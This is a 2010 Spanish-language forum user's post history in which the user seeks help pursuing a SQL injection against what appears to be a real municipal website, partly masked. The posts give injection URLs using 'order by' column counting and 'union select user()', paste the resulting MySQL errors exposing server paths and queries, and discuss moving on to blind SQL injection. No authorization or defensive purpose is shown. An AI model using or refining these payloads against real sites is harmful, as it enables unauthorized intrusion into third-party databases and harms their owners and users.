Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - nuevaorden

Páginas 1 2 3
#21
Nivel Web / Re: Ayuda como seguir con SQL Inyection
22 Marzo 2010, 21:28 PM
mmmmmmm en el fichero rss.php?

http://www.*******.info/rss.php?noticies=2%20union%20select%20user%28%29,2,3%20--bisbal@localhost



Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/usuaris/bisbal/php/categoria.php on line 127

Warning: Cannot modify header information - headers already sent by (output started at /home/usuaris/bisbal/php/categoria.php:126) in /home/usuaris/bisbal/rss.php on line 27

Warning: Cannot modify header information - headers already sent by (output started at /home/usuaris/bisbal/php/categoria.php:126) in /home/usuaris/bisbal/php/rss10.php on line 77
http://www.******.cat Les últimes notícies de l'Ajuntament http://www.******.cat/index.php?noticies=2&codi=376 PLE ORDINARI DEL 26 DE GENER DE 2010  http://www.********.cat/index.php?noticies=2&codi=374 PLE EXTRAORDINARI DEL DIA 21 DE GENER DE 2010 http://www.******.cat/index.php?noticies=2&codi=364 PLE ORDINARI DEL 27 DE GENER DE 2009 http://www.******.cat/index.php?noticies=2&codi=363 PLE ORDINARI DEL 30 DE JUNY DE 2009  http://www.*********.cat/index.php?noticies=2&codi=361 PLE ORDINARI DEL DIA 22 DE DESEMBRE DE 2009
#22
Nivel Web / Re: Ayuda como seguir con SQL Inyection
22 Marzo 2010, 21:18 PM
no tiene buscador............. buscando mas
#23
Nivel Web / Re: Ayuda como seguir con SQL Inyection
22 Marzo 2010, 21:12 PM
OK PROVANDO, y como dices tu es de esta gente si !!!
#24
Nivel Web / Re: Ayuda como seguir con SQL Inyection
22 Marzo 2010, 21:10 PM
No s'ha pogut llegir select * from pdfs where idarticle=-1 order by 6/* and categoria=1 order by codi asc

mmmmmm
#25
Nivel Web / Re: Ayuda como seguir con SQL Inyection
22 Marzo 2010, 21:06 PM
De donde has cacado el codigo????
#26
Nivel Web / Re: Ayuda como seguir con SQL Inyection
22 Marzo 2010, 20:53 PM
Salu2, no se donde has sacado el codigo pero no es este intentare con blind sql, no se si me servirá......... si me puedes aportar algo mas me lo dices mil gracias
#27
Nivel Web / Ayuda como seguir con SQL Inyection
22 Marzo 2010, 20:08 PM
Salu2,

Tengo una página que he podido, por lo menos saber las columnas de su base de datos que tiene, está creada en php y core sobre Mysql:

http://www.lapaginaweb.com/index.php?contingut=2&codi=-1%20order%20by%205/*

Poniendo al final /* me deja ver que hay 5 porque si pongo 6 me peta.

El problema está seguir, he provado con:

-1+union+all+select 1,2,3,4,5/*

Y nada me da este error:

No s'ha pogut llegir select * from contingut where codi=-1 union all select 1,2,3,4,5/*

Alguien sabe como proseguir.... gracias para la ayuda a un newbaby!!!!!
Páginas 1 2 3